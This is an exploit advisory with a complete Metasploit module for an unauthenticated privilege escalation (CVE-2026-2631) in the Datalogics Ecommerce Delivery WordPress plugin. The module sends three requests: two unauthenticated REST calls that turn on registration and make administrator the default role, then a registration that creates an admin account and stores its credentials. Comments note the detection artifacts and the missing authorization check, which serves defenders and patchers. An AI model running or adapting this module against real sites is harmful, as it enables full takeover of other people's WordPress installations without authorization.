===============================================================================================================================================================================
| # Title : WordPress Datalogics Ecommerce Delivery Plugin < 2.6.60 Privilege Escalation via Insecure Configuration Manipulation Leading to Admin Account Creation |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://fr.wordpress.org/plugins/datalogics/ |
================================================================================================================================================================================

[+] Summary :

A critical vulnerability exists in the Datalogics Ecommerce Delivery WordPress plugin versions prior to 2.6.60, allowing unauthenticated attackers to modify sensitive plugin and WordPress configuration options due to insufficient access control in the exposed REST API. The flaw enables attackers to enable user registration, change the default user role to administrator, and leverage the public registration mechanism to create an administrative account. This results in a full privilege escalation chain, ultimately leading to complete takeover of affected WordPress installations. The issue is caused by improper authentication and authorization checks on configuration update endpoints, exposing critical administrative functionality to unauthenticated users.

[+] POC :

##
# CVE-2026-2631
# Datalogics Ecommerce Delivery < 2.6.60 Privilege Escalation
##

# Auxiliary scanner module for CVE-2026-2631.
#
# The chain is three requests: two unauthenticated writes to the plugin's
# `datalogics/v1/options` REST route (users_can_register, default_role) and
# one POST to the public WordPress registration form. All three leave
# persistent artifacts on the target (the two option values and a new user),
# which is why 'SideEffects' is declared as CONFIG_CHANGES below; nothing in
# this module reverts them. From a defender's side those same artifacts are
# the detection points: an unexpected change to `users_can_register` or
# `default_role`, and an administrator account created through registration.
# The root cause described in the advisory is the missing authorization
# check on the options route (in WordPress REST terms, a `permission_callback`
# that verifies the caller may manage options).
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HTTP::Wordpress
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::Scanner

  # Module metadata and user-facing options.
  #
  # @param info [Hash] metadata merged by the framework via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'WordPress Datalogics Ecommerce Delivery Privilege Escalation',
        'Description' => %q{
          This module exploits an unauthenticated privilege escalation vulnerability in the Datalogics Ecommerce Delivery plugin (< 2.6.60).
          The API allows insecure modification of WordPress options without authentication, enabling attackers to:
          1. Enable user registration
          2. Set default role to administrator
          3. Create a new admin account via public registration flow
        },
        'Author' => [ 'indoushka' ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', 'CVE-2026-2631' ]
        ],
        'DisclosureDate' => '2026-01-01',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          # Persistent option writes and a new user account; see class comment.
          'SideEffects' => [CONFIG_CHANGES]
        }
      )
    )

    # USERNAME / EMAIL / PASSWORD are the values submitted to the registration
    # form; TARGETURI is the WordPress base path prepended to every request.
    register_options([
      OptString.new('USERNAME', [true, 'Admin username', 'admin_poc']),
      OptString.new('EMAIL', [true, 'Admin email', 'admin@poc.local']),
      OptString.new('PASSWORD', [true, 'Admin password', 'P@ssw0rd123']),
      OptString.new('TARGETURI', [true, 'WordPress base path', '/'])
    ])
  end

  # Scanner entry point, invoked once per host.
  #
  # Runs the three steps in order, each gated on the previous one. A failure
  # returns early and does NOT undo the option changes already made, so a
  # partial run still leaves the target modified.
  #
  # @param ip [String] host address supplied by the scanner mixin; unused here,
  #   the module reads rhost/rport instead
  # @return [void]
  def run_host(ip)
    @uri = normalize_uri(target_uri.path)
    print_status("Target: #{rhost}:#{rport}#{@uri}")

    unless enable_registration
      print_error("Failed to enable registration")
      return
    end

    unless set_default_role
      print_error("Failed to set default role")
      return
    end

    if register_admin
      print_good("Admin account created successfully!")
      # Stored in the framework database for later reuse by the operator.
      report_cred(
        ip: rhost,
        port: rport,
        service_name: 'wordpress',
        user: datastore['USERNAME'],
        password: datastore['PASSWORD'],
        proof: "Admin created via Datalogics exploit"
      )
    else
      print_error("Exploitation failed")
    end
  end

  # Step 1: turn on public registration by writing `users_can_register`.
  #
  # The request carries no credentials or nonce; the plugin route accepts it
  # as-is, which is the access-control defect the advisory describes.
  #
  # @return [Boolean] true on an HTTP 200 reply; the body is not inspected
  def enable_registration
    uri = normalize_uri(@uri, 'wp-json', 'datalogics', 'v1', 'options')
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => uri,
      'ctype' => 'application/json',
      'data' => { 'users_can_register' => 1 }.to_json
    })
    res && res.code == 200
  end

  # Step 2: make every newly registered user an administrator by writing
  # `default_role`. This is the value that turns a public registration into a
  # privilege escalation; it persists until an administrator resets it.
  #
  # @return [Boolean] true on an HTTP 200 reply; the body is not inspected
  def set_default_role
    uri = normalize_uri(@uri, 'wp-json', 'datalogics', 'v1', 'options')
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => uri,
      'ctype' => 'application/json',
      'data' => { 'default_role' => 'administrator' }.to_json
    })
    res && res.code == 200
  end

  # Step 3: submit the stock WordPress registration form. This is ordinary
  # WordPress functionality, not a plugin bug; it only becomes dangerous
  # because of the two option changes above.
  #
  # NOTE(review): the only success signal is an HTTP 200 on the response; the
  # page content is not checked, so "success" here means the form was served,
  # not necessarily that the account exists -- confirm against the target.
  #
  # @return [Boolean] true on an HTTP 200 reply
  def register_admin
    uri = normalize_uri(@uri, 'wp-login.php?action=register')
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => uri,
      'ctype' => 'application/x-www-form-urlencoded',
      'vars_post' => {
        'user_login' => datastore['USERNAME'],
        'user_email' => datastore['EMAIL'],
        'user_pass' => datastore['PASSWORD']
      }
    })
    res && res.code == 200
  end

  # Persist the created login in the Metasploit credential store.
  #
  # @param opts [Hash] :ip, :port, :service_name, :user, :password, :proof
  #   (all supplied by run_host)
  # @return [Metasploit::Credential::Login] the login record created
  def report_cred(opts)
    service_data = {
      address: opts[:ip],
      port: opts[:port],
      service_name: opts[:service_name],
      protocol: 'tcp'
    }

    credential_data = {
      origin_type: :service,
      module_fullname: self.fullname,
      username: opts[:user],
      private_data: opts[:password],
      private_type: :password,
      proof: opts[:proof]
    }.merge(service_data)

    create_credential_login({
      core: create_credential(credential_data),
      status: Metasploit::Model::Login::Status::SUCCESSFUL
    })
  end
end

Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================